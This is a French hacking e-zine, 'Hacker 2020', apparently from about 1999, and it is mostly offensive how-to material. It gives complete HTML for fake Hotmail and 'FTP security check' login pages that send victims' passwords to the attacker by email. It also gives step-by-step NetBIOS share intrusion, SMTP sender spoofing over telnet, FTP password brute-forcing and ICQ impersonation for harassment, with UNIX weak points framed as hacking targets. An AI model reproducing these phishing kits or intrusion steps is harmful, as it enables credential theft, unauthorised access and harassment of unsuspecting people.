HACKER 2020

ULTIMA VERSION
 
PAR: CLAD STRIFE & THORGAL
 
 

INTRODUCTION:  Suite à de nombreux articles sortis par Clad Strife et un new-zine de Thorgal, il aurait été judicieux de tout réunir dans un hacker 2020. Alors, Ultima Version, pourquoi? Parce que elle diffère de tout ce que vous avez pu voir jusqu'à présent. Bon, je vous laisse découvrir... Sachez quand même que quand les articles seront écrits par moi (Clad Strife), y'aura mon nom devant, même chose pour Thorgal.

SOMMAIRE:

DISCLAIMER: Tout ce qui est contenu dans ce magazine, n'y est qu'à titre purement informatif et éducatif. Tout ce que vous pourrez faire avec l'aide de ces différentes informations ne sauraient m'en incriminer ni Thorgal, ni mon provider, ni moi. Maintenant sachez que le piratage informatique est très durement réprimé!
 
HACKER UN COMPTE HOTMAIL ET FTP
(Clad Strife)
 
 

Comment faire: pour piéger un de vos camarades qui est pas trop méfiant, envoyez lui ceci:
S'il y répond vous recevrez ses pass  avec son login pour Hotmail...
De plus la plupart des utilisateurs ont le même pass pour leur site et leur mail!
Bon... la partie rouge correspond à votre e-mail, créez un compte mail pas trop voyant (style: hotmail_staff@caramail.com), et allez récupérez les pass là-bas. Vous devez mettre ce qui est en bleu et rouge dans votre mail. En fait ce serait plus un piège à cons qu'autre chose! Mais ça marche bien c'est sur!
 
We're Sorry, We Cannot 
Process Your Request 
Reason:  Time expired for your account. Please re-login.
Login Name: 
Password: 
 
Return to Hotmail's Homepage
1996-1999. Hotmail© all rights reserved.

d'ailleurs en voici le code source:
<html><head></head>
      <body bgcolor="#ffffff" link="#000099" vlink="#000099">
      <table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
      <tr valign=middle><th colspan=2>
      <font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>
      Process Your Request</font>
      </th></tr>
      <tr valign=middle><td align=center>
      <font face="Arial, Helvetica" size="3">Reason:&nbsp;</font>
      <font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time  expired for your account. Please
      re-login.</b></font><br>
      </td></tr>
<tr valign="middle"><td align="center">
      <FORM METHOD="POST" NAME="hotmail"
      ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"
target="_parent">
      <INPUT TYPE="hidden" NAME="recipient"
VALUE="user_guest@hotmail.com">
      <INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
      <INPUT TYPE="hidden" NAME="return_link_url"
VALUE="http://www.hotmail.com/cgi-bin/start/">
      <table cellpadding="0" cellspacing="5" border="0">
      <tr><td><font face="Arial, Helvetica" size="2">Login
Name:</font><br><input
      type="text" name="login" size="16" maxlength="16"></td><td><font
face="Arial,
      Helvetica" size="2">Password:</font><br><input type="password"
name="passwd"
      size="16" maxlength="16">&nbsp;<input type="submit"
value="Enter"></td><tr>
      </table></FORM></td></tr>
      <tr valign=middle><th colspan=2 align=center>
      <font face="Arial, Helvetica" size="3">Return to <a
      href="http://www.hotmail.com"
target="_parent">Hotmail's Homepage</a>.
      </font></th></tr></table>
<font size=2 color=black>1996-1999. Hotmail© all rights reserved.</font>
 
 

 Après quoi vous pouvez toujours faire la même chose en faisant croire à une vérification du taux de sécurité du compte ftp de la victime: voici ce que ça donne:
 
Check your ftp security!
Write in the blanks and confirm to know if your ftp account is protect. A mail will be send you... 
FTP server: 
E-mail : 
Login name : 
Password: 
 
FTP® is a program, all rights reserved.

Et voilà le code source:

<html><head></head>
      <body bgcolor="#ffffff" link="#000099" vlink="#000099">
      <table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
      <tr valign=middle><th colspan=2>
      <font face="Arial, Helvetica" size="6">Check your ftp security!<br>
      </font>
      </th></tr>
      <tr valign=middle><td align=center>
      <font face="Arial, Helvetica" size="3" color="#ff0000"><b>Write in the blanks and confirm to know if your ftp account is protect. A mail will be send you...
      </b></font><br>
      </td></tr>
<tr valign="middle"><td align="center">
      <FORM METHOD="POST" NAME="hotmail"
      ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"
target="_parent">
      <INPUT TYPE="hidden" NAME="recipient"
VALUE="user_guest@hotmail.com">
      <INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
      <INPUT TYPE="hidden" NAME="return_link_url"
VALUE="http://www.hotmail.com/cgi-bin/start/">
      <table cellpadding="0" cellspacing="5" border="0">
      <tr><td><font face="Arial, Helvetica" size="2">FTP
server:</font><br><input
      type="text" name="FTP server" size="16" maxlength="16"></td>
<td><font face="Arial, Helvetica" size="2">E-mail
:</font><br><input
      type="text" name="Mail from" size="16" maxlength="16"></td>
      <tr><td><font face="Arial, Helvetica" size="2">Login name
:</font><br><input
      type="text" name="login" size="16" maxlength="16"></td><td><font
face="Arial,
      Helvetica" size="2">Password:</font><br><input type="password"
name="passwd"
      size="16" maxlength="16">&nbsp;<input type="submit"
value="Enter"></td><tr>
      </table></FORM></td></tr>
      <tr valign=middle><th colspan=2 align=center>
</table>
<font size=2 color=black><u>FTP® is a program, all rights reserved.</u></font>
 

LES COMMANDES NETBIOS
(Thorgal)
Pour acceder aux commandes netbios il faut d'abord editer un fichier qui s'appellera "lmhosts" (EN MINUXULE!!!!), editer le fichier par l'editeur du dos pour y acceder taper "edit" dans msdos.

Vous editer donc ce fichier dans : "c:\windows"

Bon le fichier a été editer que faire?

tapez l commande suivante dans ms dos : nbtstat -A ip"DLV" (DLV= De La Victime)

vous aller alors avoir le netbios "DLV" pour savoir le nom du pc il faut qu'il y ai "unique" et il faut avoir le numero "20" devant regarder :
 

C:\>nbtstat -A (ip DLV)
 

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
VICTIME          <00>  UNIQUE      Registered
FAMILLE          <00>  GROUP       Registered
VICTIME          <03>  UNIQUE      Registered

MAC Address = 44-45-00-69-31

C:\>
 

Il y a bien unique dans   "type"  mais il n'y as malheureusement pas de <20> devant
;(
On saura pas le hacker.
Si au contraire il y as unique et  <20>  devant notez le nom et l'ip "DLV" sur une feuille.

Vous revenez ensuite dans l'editeur de ms dos et vous ouvrez "lmhosts" vous notez dedans :

148.....(ip du mec) nom #PRE

Vous enregistrer

Puis revenez dans windows

-menu démarrer

-rechercher

-ordinateur

Vous n'avez plus qu'as tapez le nom de l'ordinateur "DLV" puis vous entrerez librement dans son pc.

Et oui pas besoins de trojans pour cela mais si vous êtes conserner il y as toujours moyen de s'en proteger, la premiere protection consiste à restreindre l'accès aux ressources de votre réseau local en modifiant les propriétés de
chaque ressource de ce réseau. Par exemple, pour interdire l'accès à votre disque dur C, cliquez sur l'icône Poste de travail -
sélectionnez le disque C -  cliquez avec le bouton droit de la souris et sélectionnez Partage.

Vous pouvez ne pas partager le disque C, ou le partager en lecture seule, en accès complet ou en accès par mot de passe.
Dans le premier et troisième cas, indiquez le mot de passe d'accès à votre disque C. Ainsi, les visiteurs indélicats devront
montrer patte blanche.

Voici une astuce tordue pour savoir si vous avez un visiteur indélicat. Si vous n'utilisez pas le lecteur de disquette A pendant
vos accès à Internet, partagez-le en accès complet et donnez-lui comme nom de partage PORNO-PICTS par exemple. Les
hackers seront systématiquement attirés comme les mouches par le miel (ou moins ragoûtant, la m...). Donc, si votre disque
A se met en action, vous avez très probablement un visiteur. Et pour connaître l'identité du visiteur, passez sous DOS et
tapez simplement netstat. L'adresse IP sera très probablement indiquée par son nom de réseau.

ATTENTION ceci ne fonctionne pas a tous les coup ça fonctionne 1 fois sur 4 d'après moi mais au fur et a mesure que le temps avance cela deviens de plus en plus râre.
 

LES FAILLES ET AUTRES ARTICLES
(Clad Strife)
VIE PRIVEE : L'INDISCRETION D'UN NOUVEAU SERVICE TELEPHONIQUE

  Inscrit sur la Liste Rouge, vous vous sentez sûr de vous lorsque vous téléphonez à une société
commerciale pour un demander renseignement, à votre ex- époux(e) pour régler un litige, ou à un
inconnu pour lui faire une (bonne?) blague. Pourtant, détrompez-vous : si votre correspondant est
abonné au service "Présentation du numéro" lancé en 1997 par France Télécom, il verra votre numéro téléphonique s'inscrire en clair sur son téléphone avant même de décrocher! En effet, si vous voulez rester discret, vous devez comme tout le monde vous manifester auprès de votre agence France Télécom afin de bénéficier du "Secret permanent", ou bien composer le 3651 (#31# si vous appelez d'un téléphone mobile) avant le numéro à 10 chiffres de votre correspondant...
 

   Tout le monde connaît le presse-papier, cet endroit de la mémoire où est stocké le dernier élément que vous avez coupé ou copié (fichier, texte, image, etc.). Ce que l'on sait moins, c'est qu'avec la nouvelle version du navigateur Internet Explorer, le contenu du presse-papier peut être lu et copié par le site web que vous visitez, aux moyens de quelques instructions javascript. Mais le bug n'est pas là, car selon Microsoft, il s'agit dans ce cas d'une "fonctionnalité qui peut être utilisée d'une manière non prévue au départ" (interdit de rire). Le bug est plus grave, à savoir qu'une faille de sécurité dans I.E. 5.0 permet à un site web malintentionné de se faire envoyer un fichier présent sur votre disque dur, toujours grâce à des instructions javascript, pour peu que son nom soit connu ou deviné. Encore une fonctionnalité I.E.?
VIE PRIVEE : ENCORE UN FICHIER DE CARTES BANCAIRES EN LIBRE ACCES SUR LE NET

  La gaffe monumentale est cette fois à mettre sur le compte de la filiale Royaume-Uni de Nintendo. Suite à une erreur de configuration, le serveur de son site web a en effet laissé en libre accès durant tout ce week-end les données confidentielles de ses clients : adresses IP, adresses emails et postales, noms complets, numéros de téléphone, numéros de cartes bancaires et dates de validité. Les personnes concernées sont domiciliées partout dans le monde. A priori, ça n'est pas comme ça que l'on va inciter les gens à s'adonner au commerce électronique...

ALERTE CONTAMINATION : NE FAITES PAS CONFIANCE A MELISSA...
 
Ce nouveau virus se propage en effet à une vitesse considérable depuis ce vendredi, et aurait d'ailleurs comme but ultime de paralyser les réseaux et serveurs de mails. Mélissa se présente sous la forme d'un email intitulé "Message important de...", et dont le contenu contient une phrase comme "Voici le document important que vous avez demandé, ne le montrez à personne". Bien sûr, il s'agit d'une ruse pour exciter votre curiosité, et vous pousser à ouvrir un fichier Word de 40 Ko joint au courrier. Ne le faites surtout pas, car ce fichier Word est contaminé : si vous l'ouvrez, le virus utilise votre annuaire de courrier électronique pour y piocher 50 adresses, s'autoreproduire et s'autoenvoyer chez ces 50 malheureux correspondants. Si vous recevez un mail suspect, le plus simple est de le détruire (ainsi que sa copie éventuellement stockée dans un répertoire "Eléments supprimés") sans toucher au document attaché.
LE MOUCHARD DE MICROSOFT

   Vous vous rappelez du "Registration Wizard" de Windows95 qui envoyait la liste de vos logiciels à Micro$oft? Ben il avait disparu... Mais qu'est-ce donc? Il est dans OFFICE200? cette fois il est ouvertement destiné à l'anti-piratage, et on ne peut le désactiver (merde!! ;)).

EXCEL EN FORCE...HUHUM!

    D'après la découverte d'un trou de sécurité du tableur vedette Excel, une fonction prévue initialement pour diviser en frames les pages webs, permettrait à un hacker d'introduire un programme auto-destructeur sur l'ordi. Ainsi l'éditeur nous propose un patch, mais reste cependant vague sur ce qui pourrait avoir attrait à cette "fonctionnalité".
 

COMMENT ENVOYER DES MAILS ANONYMES VIA TELNET
(Clad Strife)
 
   Tout d'abord ce qu'il faut savoir: ici on va parler de faux mails, ce qui tient à dire un mail anonyme. C'est mieux que anonymail.exe, vu que cette fois-ci vous n'aurez besoin que de Telnet. Si c'est pas beau ça?
   Alors, d'abord, il vous faut savoir qu'un courrier anonyme est tout à fait légal, car comme tout textes, il est légal! c'est le contenu de ce que vous pourrez mettre à l'intérieur qui est illégal!!! Tel que la diffamation, l 'injure, le harcèlement, etc...
   Cependant, méfiance. En effet, vous avez beau envoyez des mails anonymes, vous n'en êtes pas moins détectable pour autant. Lors de l'envoi du mail par telnet, votre IP est glissé insudueusement parmis les informations du mail. Cependant en passant par un anonymyzer, ou une série de proxy, vous vous rendrez à 99 % indétectable. On y va?

Prenons un exemple de serveur telnet (sachez quand même que 90% des serveurs ne sont pas protégés et vous laisseront envoyer des mails via leur compte), donc on prend: www.finetprint.com, on rentre sur ce serveur par le port 25:

Donc voilà comment se présente l'affaire. Ensuite vous vous connecter, et le serveur va se présenter:
220 ns0.inside-interactive.net ESMTP Sendmail 8.8.8/8.8.8; Sun, 21 Mar 1999 10:5
8:23 +0100 (CET)  . Il attend que vous lui donniez des ordres. alors vous tapez:
mail from: lamer@hotmail.com
Bien sur vous mettez ici un faux mail. Le serveur répond:
250 lamer@hotmail.com... Sender ok
La il est content. Ensuite vous devez précisez les destinataires, tapez donc:
rcpt to: test@hotmail.com le serveur dit:
250 Recipient test@hotmail.com ok (il faut que l'e-mail soit existant)
Vous pouvez mettre autant de rcpt to: que vous le désirez à condition de retourner à la ligne. Ensuite vous tapez data.
Toujours aussi heureux le serveur dit:
354 ok Send data ending with "."
TOUT ROULE...
Maintenant vous tapez votre message:
Date: 23, 46, 2099
Cc: tesmains@caramail.com

Salut devine qui t'écrit
Le Nolamer, Clad Strife.
A+
N'oubliez pas de mettre un point à la fin du message!
.
Ahh! c'est réussi! le serveur mettra:
250 Message received: 19990321105935.AAA18923@adresse'tcp.ville
AH? votre adresse TCP? Mais que se passe-t-il donc? ben oui z'êtes pas aussi protégés que vous pourrez le croire, en effet votre victime recevra un mail anonyme, mais dans les infos de l'enveloppe il pourra retoruver votre adresse TCP/IP, par ce message:
X-AUthentication-WARNING: IP <fauxmail@fauxserveur.com>
ALors? Ben évitez et limitez les dégâts. On pourra toujours vous retrouver mais le warning disparaitra! comment faire? Ben... avant de taper mail from, au tout début, tapez helo hotmail.com
Attention, car certains serveurs telent refusent cette commande. Mais dans le cas échéant le serveur mettra:
250 ns0.inside-interactive.net Hello ADRESSE TCP [134.134.134.134], pleased to meet you
Encore mon adresse TCP et IP?
Ben oui, mais vous avez fait un signe au serveur qui ne s'inquiètera plus.
Vous retapez les même commandes que précédemment et ils verront plus le gros X-Authentication-warning vos destinataires. Méfiance quand même: certains serveurs mails, tels que hotmail, vous repèreront, d'ou l'utilité de passer par un anonymizer.
 
 

 QUELQUES TRUCS ICQ
(clad strife & Thorgal)
1 comment spoofer son ip d'icq sans programme?(Thorgal)

Pour cela vous avez juste besoin de 5 choses

-icq

-icq

-icq

-icq

-icq

Voila essayez d'avoir tous le materiel necesaire ou si non cela n'ira pas ;o))))))

Prenez l'ip de quelqu'un ;

aller dans

-icq

-preferences

-serveur

et changer le serveur qui est noter

icq.mirabilis.com

et laisser icq1.mirabilis.com

Apres cela deconencter vous d'icq et reconnectez vous apres!

aller dans securiti privacy et enlever

do not ip publish!

Le tour est jouer!!!!!!!!

ATTENTION: cette astuce fonctionne rarement mais ça vaux le coup d'essayer.

l.N'oubliez pas de prendre note des anciens serveurs au cas ou icq ne voudrait pas se reconnecter.

De plus celà ne marche que si la personne utilise: ICQ IP SNIFFER (Note de Clad)

2 Comment reperer quelqu'un qui joue avec multiicq?(Thorgal)

Il va venter son autre nick par ex si je m'appelle nozep je vais dire:

nozep : tu connais thorgal?

victime : oui je l'ai dans ma liste

nozep : c'est le meilleur hacker que je connaisse il sais tous faire

victime : a ouai! c cool ça!!!!

Nozep : c'est lui qui m'as tout apris

victime : vraiment?

nozep : si je te le dis!

nozep : comment tu le trouve toi?

victime : je lui ai jamais vraiment parler mais il n'as pas l'air tres sociable!

victime : tu crois qu'il voudra m'apprendre?

nozep : non, tu est trop nul pour lui cela mettera trop de temps!

..........

voilà

ensuite si c'est un de vos amis il va vous questionner ex:

nozep : salut je suis le pire ennemi de thorgal c vraiment le plus con des cons

victime : ha bon

nozep : qu'est ce que tu en trouve toi?

victime : ben ça va quoi il est pas chiant avec moi!

nozep : il ne t'as jamais fait de sale coup?

victime : oui il m'as hacker mon site cet enculer!!

nozep : tu veux le hacker avec moi?

victime : il en saura rien que c'est moi hein??

nozep : t'en fait pas je metterai tous sur mon dos

victime : ok pas de prob alors , on commence maintenant?

nozep : ok!

...........

La seule façon de verifier si ce gars vous le connaissez c'est de regarder l'ip qui sera forcement le même a part si il a ete spoofer(si c'est le cas essayer de decouvrir qui c'est!)

Si c'est le même ip jouer le jeu

;o)

Vous verrez comme les gens sont faux cul quelques fois!

j'ai un peu exagerer sur ce texte mais comme ça vous saurai a quoi vous en tenir!

6.3 Comment trouver un ip qui n'est pas montrer sur icq sans programme?(Thorgal)
 

Pour faire cela c'est bien facile! ce truc ne marche cependant que avec icq 98
;o(
Vous regarder dans les infos de quelqu'un et il ne montre pas son ip
;o(
vous penser directement a votre sniffer mais il vous viens a l'esprit que vous l'vez virusser il y as pas longtemps
Et bien vous rester sur le gars en question
Vous mettez la fleur rouge sur icq (donc vous vous deconnecter d'icq) et vous n'avez plus qu'as
regarder dans les infos du gars!
c cool non?
Ceci fonctionne a out les coup et donne toujours le bon ip!!!
cependant il faut avoir la version d'icq 98!

3. Comment envoyer des messages vides sur icq(Clad Strife)

La technique est bête et facile à réaliser! cependant il fallait y penser! Alors vous avez devant vous la fenêtre ou vous devez écrire le message, mettez: alt+0160 . Une sorte d'espace va se créer, et icq vous permettra d'envoyer du... vide, il faut l'dire!

4. Comment se faire passer pour quelqu'un d'autre(Clad Strife)

C'est assez simple à faire mais, sachez que c'est utile quand quelqu'un vous fait chier, vous vous faites passer pour lui auprès de sa cyber-meuf, et vous l'insultez sauvagement! Effet garanti... Mais bon si on passait à la pratique? Vous ouvrez Icq et vous allez dans:
ICQ
Add/Change Current User
Register A New User (ICQ#)
Vous notez TOUTES les informations de la victime, et vous les metez à son insu; résultat: seule l'UIN le différencie de vous (et l'IP aussi bien sur). Et en finish pour alterner les utilisateurs (donc vous et "lui"), vous faites:
ICQ
Add/Change Current User
Change the Active User
Et de là choisissez celui sur lequel vous désirez aller!
 

LA VERSION D'UN HACKER D'APRES THORGAL
(Thorgal)
Pour moi un hacker c'est quelqu'un qui sais hacker sans se servir des programme des autres , par les moyens qu'il a

PoUR MOi Ce Ne SOnT Pas L3s HAck3Rs QuI eCRiV3Nt COMme çA MaIS BiEN LeS LaMM3rS De M3Rd3s.

Un hacker essaye de ne pas se faire remarquer car dès qu'il se vantent de ses capacitées de hacking les autres personnes le traite de delinquant d'internet , ce qui lui retire toute leur confiance.

Il s'interesse aux moins fort, lui apprend des trucs pour qu'ils le respectent, pour qu'il le prennent pour son maître, il n'exagere pas la dessus, ce jeux est tres dangereux quand le lammer s'aperçoit que vous êtes un esti de lammer pire que lui(lol)

ATTENTION: il ne faut pas confondre hacker et crascher

la difference entre un hacker et un crascher est la mentaliter

un hacker hack pour decouvrir les failles d'un symstème et doit avoir une raison valable pour hacker tandis qu'un crascher s'amuse a peter les système et les pc sans raisons

en général les crascher sont detester dans le monde du piratage informatique.

 
LA MENTALITE D'UN HACKER PAR CLAD STRIFE ET THORGAL
1/ Pourquoi est-il tabou?(Clad Strife)
2/ Pourquoi est-il hors-la-loi?(Thorgal)
3/ Est-il juste de l'interdire sous toutes ses formes?(Thorgal)
4/ Doit-on arrêter les pirates inoffensifs?(Clad Strife)

1/ La plupart des gens considèrent le hacking comme un sujet tabou. Pour quelle raison? Ben, en fait en général les gens ont assez peur de ce qu'ils ne maitrisent pas! Celà abouti a une sorte de paranoïa collective, qui rendrait le hacking à sa mauvaise valeur (son côté obscur). Bien sur certaines personnes n'hésitent pas à dévaloriser l'image du hacking. Mais le hacking, ce n'est que du piratage à "l'état pur". après les personnes qui le pratiquent peuvent, par elles-mêmes, décider de ce qu'ils en feront. Par exemple pirater pour démontrer la fiabilité d'un système et visant à le renforcer, ou l'anihiler. c'est ce côté que les gens craignent, ils hésiteront donc a en parler. Certaines peresonnes car elles risqueraient de montrer qu'elles sont faibles, et donc celà aboutirait, pour elles, à devenir des cibles faciles. Les autres se diront: "allons pas leur foutre de mauvaises idées à tous ces psycho-surfers et cyberpunks", mais celà ne ralentira jamais sa progression dans les esprits de ces soi-disant "psycho".
Donc les hackers ou lamers se sentiront criminalisés, et auront tendance à se criminaliser vu que perosnne ne leur donne leur chance et qu'on ne les montre pas au grand jour tels qu'ils devraient l'être! Donc ils resteront dans l'ombre, l'ombre fait peur, les gens auront peur etc... Il y a un cercle vicieux qui s'est ainsi créé... C'est tout ce qu'on peut dire de ce phénomène dont personne n'ose jamais parler.
Auteur: Clad Strife
 

2/ Pourquoi est-il hors-la-loi

C'est simple...
Imaginez vous que vous insultez quelqu'un au cour d'une dispute et que juste apres vous avez un disque dur prêt à être formaté. Cela vous plairait -il??
Non et bien c'est pour ca que le hacking est hors la loi et cela ne selimite pas à hacker un ordinateur.
Par exemple:
Vous voulez rentrer dans les ordinateurs de la nasa vous êtes directement tracez et vous avez un email d'avertissement ou une amende de 500000ff
Et ce n'est pas tout, les sites que vous hacker il y as bien quelqu'un qui paye et celui ci ira ce plaindre et voudra son argent de retour(en cas de serveur).
c'est pour ca qu'il y a des regles et que le hacking est hors la loi.
Dans la vie, celui qui tue est puni et va en prison.
Ici celui qui tue les ordi, les serveurs, ou pille des banques de données, etc etc..... est un hors la loi
Donc le hacker est hors la loi (bien que hacker ne soit pas toujours pirater dans un but nuisif!).
C comme au football il y a des arbitres pour faire respecter le reglement. Ici il y as des flics pour nous tracer
By Thorgal
 

3/ Est-il juste de l'interdire sous toutes ses formes?

Je vous dit oui et non
Car n'oublions pas que sans les hacker internet n'aurait été qu'a l'armée.
En plus si un autre hacker vous attaque comment faire pour vous défendre???
vous n'avez qu'as contre-attaquer mais comment contre attaquer????
en etant un hacker
mais comment être un hacker?????? Tout simplement en apprenant des trucs illegaux et en telechargent des trucs illegaux, voir réprimés sévèrement (ex de Back Orifice) aussi, alors pourquoi interdire le hacking???(c'est expliqué au paragraphe deux). Vous voyer qu'on tourne en rond!!!!!!!!!!
Alors tel est la question faut-il interdire le hacking sous toute forme??
on peut se poser bcp de questions la dessus mais on en reviens toujours au même pointsi il y avait pas de hacker le net serais parfait mais vous n'auriez pas les crack de jeux et tout ca
n'est ce pas vrai?????????? Si les hacker n'avaient pas éxisté, internet non plus n'existerait pas, mais si il n'y avait pas de hacker du tout, pas de problemes de piratage.
Il faut penser a tout cela.
By Thorgal
 

4/ Doit-on arrêter les pirates inoffensifs?

Certains diront: Oui! il le faut! Chacun a droit à sa vie privée sans être menacé par de petits pirates!
Mouais et ben que répondre à ça, si ce n'est que, lui, le NSA peut vous surveiller, écouter vos conversations téléphoniques quelles qu'elles soient et à n'importe qu'elle heure! Il peut grâce à ses satellites savoir quel journal vous lisez, il a accès à toutes les banques de données stockées partout dans le monde. Savoir si vous avez Win95 ou Win98 et savoir si se sont des versions pirates! ainsi vous ne pourrez jamais avoir de vie privée... Il sait quelle voiture vous avez, si vous êtes mineur, majeur, nom prénom, âge... qui peut parler de vie privée dans de telles conditions??? tous vos déplacements peuvent être surveillés et la chaine de radio ou tv , que vous écoutez actuellement, pourra être trouvée... Ce n'est pas une fiction, on est loin d'être dans "Ennemi d'Etat", c'est la réalité.

   Maintenant, doit-on mettre en prison ou coller une amende à un hacker qui aurait pénétré un système informatique! Si celui-ci n'a rien détruit, et a démontrer la "non-fiabilité" d'un système quelconque, doit-on l'en blâmer?
Le système ne sera-t-il pas protégé aussitôt? De telle sorte à ce qu'un méchant pirate ne puisse plus rentrer dans le système visant à le détèriorer... C'est un dilemme qui confronte justice et mentalité du hacker!
Que faire? C'est à Eux de me le dire et c'est à Eux de trouver une solution.
Auteur: Clad Strife
 

Fonder un clan
(Thorgal)
Reflechissez bien avant de fonder un clan, soyer une elite vous même et tester chancun de vos membres chaque moi

être une elite ce n'est pas hacker par le socket ou BO (les trojans pour moi c'est la honte a l'etat PUR si vous ne faites que cela un bon conseil

lisez pleins de magazines de hacking pour apprendre et au fur et a mesure les trojans ne vous servirons a rien, a part en cas d'urgence!

mais bon

si vous êtes un lammer et que vous enguager des lammer ce clan sera pouris!Croyer en mon experience.

Les vrai elites vont se rebeller contre vous, vous serez tester et jeté, les membre seront inactif car il n'y as pas d'autoritée dans votre clan

attendez 2 semaines pour bien y reflechir!
 

Hacker un site perso
(Thorgal)
Je vais vous apprendre la methode pour cracker le pass de ce site
Pour ce chapitre vous devrez vous munir de:
_un brute force et specialement "Vcrackftp"
_un dico

Ouvrez   "Vcrackftp"
Dans  "host"  vous mettez le nom du serveur
ex si le site est:  www.multimania.com/victime
Vous metterez   "www.multimania.com"  dans host
Vous mettez   "victime"    dans user
Vous laissez le port 21
Dans password vous selectionnez le dico de votre choix (un programme les fais sois même par le dos (ce prog s'appelle dikmaker))
vous pressez sur go et cela tournera tout seul.
Il va mettre le bon password dans la colonne de droite.
Pas tres compliquer hein
;o)

ATTENTION: cette technique ne fonctionne pas sur tout les erveurs donc ne vous etonnez pas si il est mis wondows socket error dans un message d'erreur
 

QUELQUES TRUCS LINUX
(Clad Strife)
MERCI AU MAGAZINE UNDERWAY POUR SON AIDE APPORTEE
 

Bon, on va reprendre entierement le systeme... On abordera dans cette
première partie que les faille du systeme UNiX. On vera comment hacker
ce systeme dans une deuxime partie.
C pour ca que ca risque d'être long...
A noter que je tiens c informations d'un bouquin sur la securite :
"securite reseaux", j'en remercie l'auteur:)).
 
 

-------------------------|
I-:presentation d'UNiX : |
-------------------------|
 
 

UNiX est un systeme qui a ete cree en 1972. C un extraordinaire OS
qui depuis la date de ca creation reste inegale en matiere de
portabilite et d'interoperabilite. Le reseau internet est presque
entierement constitue de machine UNiX. D'ou l'importance de cet OS.

Mais en fait cet Os a une grande faiblesse : la securite... ;)))

Meme si de part son architecture, il offre une + grande securite que
ms-dos.

Je v presenter dans le tableau si dessus les differences importantes entre
ms-dos et UNiX :

__________________________________________________________________________
|____________________________________|___________________________________|
|           |                                   |
|               UNiX           |     Ms-dos                |
|____________________________________|___________________________________|
|                                    |                                   |
|UNiX est multi-utilisateur. C à dire|Ms-dos n'a pas ce concepte multi-  |
|que sa securite est base sur un sys-|utilisateur. C à dire que une fois |
|teme de privileges. Les utilisateur |connecte à une machine dos tous    |
|d'UNiX ont chacun un passwd & ont   |vous est permis...                 |
|chacun des autorisations + ou -     |                                   |
|grande en ce qui concerne le reseau.|                                   |
|L'utilisateur le + interessant est  |                                   |
|le root.                            |                                   |
|____________________________________|___________________________________|
|                                    |                                   |
|Sous UNiX les programmes ne peuvent |Sous Ms-dos le programme peut      |
|pas ecrire sous n'importe quelle    |ecrire n'importe meme là ou se     |
|du HD...                            |trouve le systeme d'explotation... |
|____________________________________|___________________________________|
|                                    |                                   |
|UNiX ne permet à aucun programme de |Cela est possible sous Ms-Dos      |
|de modifier un file.                |                                   |
|____________________________________|___________________________________|
--------------------------------------------------------------------------

Voila a peut près les differences entre UNiX et Ms-Dos.

Meme si, on le voit dans ce tableau, UNiX est + securise que le Dos, il n'a
pas ete concu pour offrir un maximum de securite. On peut biensur rendre
UNiX + sur mais il n'est pas configure en tant que tel dans sa version par
default ;))))) .

Si l'on configure UNiX pour qu'il soit + securise alor il faudra faire ca
en trois parties :
-la securites des comptes
-la securites des connexions exterieurs
-la securites des fichiers et des repertoires
 
 

--------------------------------------------------|
II-Les bugs et les erreurs d'utilisation d'UNiX : |
--------------------------------------------------|
 
 

I-La securite des comptes :
----------------------------

1.Les passwd :
---------------
La securite des comptes sont surtout du aux passwords. Pour un utilisateur
UNiX, il faut choisir un passwd qui ne puisse etre devine. Par exemple
pour l'utilisateur root, son passwd ne sera pas "root". C une question pri-
maire, mais que beaucoup d'utilisateur oublie... :))))))))))) Mais ne
comptez pas sur cette faille, pour hacker une machine sous UNiX. Seul les
utilisateur qui ne sont pas expert en informatique ne prennent pas guarde
à leur passwd & par consequent c utilisateurs ne sont pas très important
dans la pyramide des privileges... Toute fois vous pouvez essailler cette
faille pour des reseaus tout nouveau qui n'ont pas encore ete configures...
La + part des reseau UNiX obligent leur utilisateur à changer regulièrement
leur passwd :(((, mais on vera ca dans la seconde partie.

2.Les comptes obsoletes :
-------------------------
Il arrive que l'on puisse trouver des comptes obsoletes qui n'ont pas encore
ete anulé (mort de l'utilisateur, ou depart en vacance). L'administrateur
reseau peut donc annuler ces comptes en mettant une date d'expiration des
comptes. La encore on peut prendre la place de account :))).

3.Les comptes des visiteurs :
-----------------------------
C un cauchemar pour la securite :))). les comptes visiteurs sont
les premiers a essailler dans un systeme UNiX recent qui n'a donc pas pu etre
configure... ;))))))))))))))

4.Les comptes sans passwd :
---------------------------
C fou, non ??? & pourtant ca existe !!!

5.Les groupes et les comptes de groupes :
-----------------------------------------
Pour enregistrer des groupes il y a deux maniere de le faire :
a:laissez les utilisateur du groupes connectes avec le meme passwd et le meme
nom d'utilisateur. ;)))
b:editer le fichier de group /etc/group, creer le groupe et d'y associer la
liste des utilisateur...
Le format du fichier est :
 
nom du groupe:passwd:numero d'identification:utilisateur1,utilisateur2 ....

6.Le systeme NIS :
------------------
Le systeme NIS est un moyen très pratique de partager, entre plusieur machines
un seul fichier passwd et un seul fichier group ;))).
Par exemple si on veut changer un passwd sur un reseau, il faut le faire sur
toute les machine, lorsqu'il n'y a pas NIS. Sur les grand reseaux de 1000
becanes, c assez dur.... Voila pourkoi on a fait NIS.
NIS fonctionne ainsi : sur la machine cliente, le fichier passwd contient
une entré libellee +::0.0:: . Lorsque l'utilisateur ce connecte sur une machi-
ne client, NIS demande le login et le passwd. Au signe + près, l'entre passwd
est exactement la meme que celle d'un compte root sans nom d'utilisateur ni
passwd. :))) On vera en detail le systeme NIS dans une autre partie...
 
 

II-Securites des connexionx exterieures :
-----------------------------------------

Voila, on va attaquer des choses un peu plus interressantes :))).

1.Les machines equivalentes :
-----------------------------
Le mecanisme des machines equivalentes (trusted host) permet de specifier une
liste de machines ou un utilisateur ayant le meme nick sur les deux machines
peut etablir une session ou executer une commande à distance sur une machine
cible sans passwd.
Le fichier /etc/hosts.equiv contient la listes des machines equivalentes. Les
utilisateur qui ouvrent une session pas la commande rlogin ou excutent une
commande par rsh n'ont pas a fournir de passwd ;))) s'il viennent d'une
machine listee dans ce fichier (spoof, spoof, spoof :))).
